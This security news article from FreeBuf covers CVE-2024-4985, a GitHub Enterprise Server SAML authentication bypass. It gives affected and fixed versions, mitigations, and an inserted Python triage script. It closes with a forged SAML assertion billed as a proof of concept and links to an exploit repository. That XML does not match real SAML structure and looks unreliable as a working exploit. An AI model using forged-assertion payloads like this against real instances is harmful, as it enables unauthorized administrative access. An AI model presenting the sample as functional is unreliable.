
Authentication bypass: GitHub Enterprise Server hit by critical vulnerability, PoC attached


freeBuf

Security researchers recently disclosed a critical vulnerability (CVE-2024-4985, CVSS score 10.0) in GitHub Enterprise Server (GHES) that allows attackers to access GHES instances without prior authentication. The vulnerability affects all GHES versions prior to 3.13.0 and is fixed in versions 3.9.15, 3.10.12, 3.11.10 and 3.12.4.

GitHub has released fixes and has not observed large-scale exploitation of the vulnerability. Users should update GHES to a patched version (3.9.15, 3.10.12, 3.11.10, 3.12.4 or later). If an immediate update is not possible, temporarily disabling SAML authentication or the encrypted assertions feature can serve as a mitigation.

GHES is a self-hosted software development platform that allows organizations to store and build software using Git version control and automate the deployment process.

The vulnerability stems from a flaw in how GHES handles encrypted SAML assertions. An attacker can craft a forged SAML assertion containing valid user information. When GHES processes the forged assertion, it fails to properly verify its signature, allowing the attacker to access the GHES instance.

Successful exploitation of this vulnerability could allow an unauthenticated attacker to gain full administrative control of a GHES instance, enabling them to access all data and perform any action on the system.

GitHub further noted that encrypted assertions are not enabled by default and that the vulnerability does not affect instances that do not use SAML single sign-on (SSO), or that use SAML SSO without encrypted assertions. Encrypted assertions allow site administrators to increase the security of a GHES instance by encrypting the messages the SAML identity provider (IdP) sends during the authentication process.
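The two conditions above (patch level and the SAML-with-encrypted-assertions configuration) are what an administrator needs to triage an instance. The following is an added example, not code from the article or from GitHub; it encodes only the version facts the article states, and the hostnames and configuration flags in the sample inventory are constructed.

```python
"""Triage helper: is a GHES instance exposed to CVE-2024-4985?

Added example, not code from the article or from GitHub. It uses only the
facts the article states: all versions before 3.13.0 are affected, the fix
shipped in 3.9.15, 3.10.12, 3.11.10 and 3.12.4, and the bug is only reachable
when SAML SSO is used together with encrypted assertions.
"""

# Fixed patch level per affected 3.x minor release, taken from the article.
FIXED_PATCH = {9: 15, 10: 12, 11: 10, 12: 4}
FIRST_UNAFFECTED = (3, 13, 0)


def parse_version(text: str) -> tuple[int, int, int]:
    """Parse 'major.minor.patch' (e.g. '3.11.9') into a comparable tuple."""
    parts = text.strip().split(".")
    if len(parts) != 3 or not all(p.isdigit() for p in parts):
        raise ValueError(f"unexpected GHES version string: {text!r}")
    major, minor, patch = (int(p) for p in parts)
    return major, minor, patch


def is_patched(version: str) -> bool:
    """True if this release contains the fix for CVE-2024-4985."""
    major, minor, patch = parse_version(version)
    if (major, minor, patch) >= FIRST_UNAFFECTED:
        return True
    if major == 3 and minor in FIXED_PATCH:
        return patch >= FIXED_PATCH[minor]
    # Older branches (3.8 and below) are affected and have no listed fix.
    return False


def assess(version: str, saml_sso: bool, encrypted_assertions: bool) -> str:
    """Combine the patch level with the two configuration preconditions."""
    if is_patched(version):
        return "patched"
    if not (saml_sso and encrypted_assertions):
        return "unpatched-but-not-exposed"
    return "vulnerable"


if __name__ == "__main__":
    # Constructed sample inventory (hostnames and settings are made up).
    inventory = [
        ("ghes-a", "3.11.9", True, True),
        ("ghes-b", "3.11.10", True, True),
        ("ghes-c", "3.12.3", True, False),
        ("ghes-d", "3.8.2", True, True),
    ]
    for host, ver, sso, enc in inventory:
        print(f"{host}: {ver} -> {assess(ver, sso, enc)}")
```

An instance reported as "unpatched-but-not-exposed" still needs the update; the label only records that the SAML precondition described by GitHub is absent today.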

PoC attached


<Assertion ID="1234567890" IssueInstant="2024-05-21T06:40:00Z" Subject="CN=John Doe,OU=Users,O=Acme Corporation,C=US">
  <Audience>https://your-ghes-instance.com</Audience>
  <SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:assertion:method:bearer">
    <SubjectConfirmationData>
      <NameID Type="urn:oasis:names:tc:SAML:2.0:nameid-type:persistent" Format="urn:oasis:names:tc:SAML:2.0:nameid-format:basic">jdoe</NameID>
    </SubjectConfirmationData>
  </SubjectConfirmation>
  <AuthnStatement AuthnInstant="2024-05-21T06:40:00Z" AuthnContextClassRef="urn:oasis:names:tc:SAML:2.0:assertion:AuthnContextClassRef:unspecified">
    <AuthnMethod>urn:oasis:names:tc:SAML:2.0:methodName:password</AuthnMethod>
  </AuthnStatement>
  <AttributeStatement>
    <Attribute Name="urn:oid:1.3.6.1.4.1.11.2.17.19.3.4.0.10">Acme Corporation</Attribute>
    <Attribute Name="urn:oid:1.3.6.1.4.1.11.2.17.19.3.4.0.4">(email protected)</Attribute>
  </AttributeStatement>
</Assertion>

Reference Links:

https://github.com/absholi7ly/Bypass-authentication-GitHub-Enterprise-Server

https://thehackernews.com/2024/05/critical-github-enterprise-server-flaw.html

This article is an independent point of view; no reproduction without permission. Please contact FreeBuf customer service XiaoBee for authorization, WeChat: freebee2022
